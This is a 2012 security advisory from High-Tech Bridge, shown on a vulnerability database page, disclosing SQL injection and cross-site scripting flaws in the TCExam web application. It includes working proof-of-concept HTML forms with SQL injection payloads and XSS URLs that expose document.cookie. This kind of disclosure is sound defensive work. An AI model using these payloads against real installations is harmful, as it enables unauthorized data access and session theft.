Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
htbridgeHigh-Tech BridgeHTB23111
HistoryAug 22, 2012 - 12:00 a.m.

Multiple vulnerabilities in TCExam

2012-08-2200:00:00
High-Tech Bridge
www.htbridge.com
28

EPSS

0.003

Percentile

65.5%

JSON

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in TCExam, which can be exploited to perform Cross-Site Scripting (XSS) and SQL injection attacks.

  1. SQL Injection in TCExam: CVE-2012-4601
    1.1 Input passed via the “user_groups[]” POST parameter to /admin/code/tce_edit_test.php is not properly sanitised before being used in a SQL query.
    This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
    The following PoC (Proof of Concept) demonstrates the vulnerability:
    <form action=“http://tcexam/admin/code/tce_edit_test.php” method=“post” name=“main” id=“main”>
    <input type=“hidden” name=“test_id” value=“0”>
    <input type=“hidden” name=“test_name” value=“test_name”>
    <input type=“hidden” name=“test_description” value=“test_description”>
    <input type=“hidden” name=“user_groups[]” value=“‘+(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))+’”>
    <input type=“hidden” name=“add” value=“add”>
    <input type=“submit” name=“Submit” value=“Send”>
    </form>
    1.2 Input passed via the “subject_id” POST parameter to /admin/code/tce_show_all_questions.php is not properly sanitised before being used in a SQL query.
    This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
    The following PoC demonstrates the vulnerability:
    <form action=“http://tcexam/admin/code/tce_show_all_questions.php” method=“post” name=“main” id=“main”>
    <input type=“hidden” name=“subject_module_id” value=“2”>
    <input type=“hidden” name=“subject_id” value=“1 UNION SELECT question_type, version() AS numquestions FROM tce_questions”>
    <input type=“hidden” name=“update” value=“update”>
    <input type=“submit” name=“Submit” value=“Send”>
    </form>
    Successful exploitation of these vulnerabilities (1.1,1.2) requires attacker to be registered and logged-in and have permission level 5 or above.

  2. Cross-Site Scripting (XSS) in TCExam: CVE-2012-4602
    Input passed via the “cid” and “uids” GET parameters to /admin/code/tce_select_users_popup.php is not properly sanitised before being returned to the user.
    This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of an affected website.
    The following PoC demonstrates the vulnerability:
    http://tcexam/admin/code/tce_select_users_popup.php?cid="><script>al ert%28document.cookie%29;%3C/script%3E
    http://tcexam/admin/code/tce_select_users_popup.php?uids="><script>a lert%28document.cookie%29;%3C/script%3E

Related

nvd 2
cve 2
prion 2
cvelist 2
nvd
nvd
CVE-2012-4601
2012-11-23 20:55:03
CVE-2012-4602
2012-11-23 20:55:03
cve
cve
CVE-2012-4601
2012-11-23 20:55:03
CVE-2012-4602
2012-11-23 20:55:03
prion
prion
Cross site scripting
2012-11-23 20:55:00
Sql injection
2012-11-23 20:55:00
cvelist
cvelist
CVE-2012-4601
2012-11-23 20:00:00
CVE-2012-4602
2012-11-23 20:00:00

EPSS

0.003

Percentile

65.5%

JSON
Related for HTB23111
nvd2cve2prion2cvelist2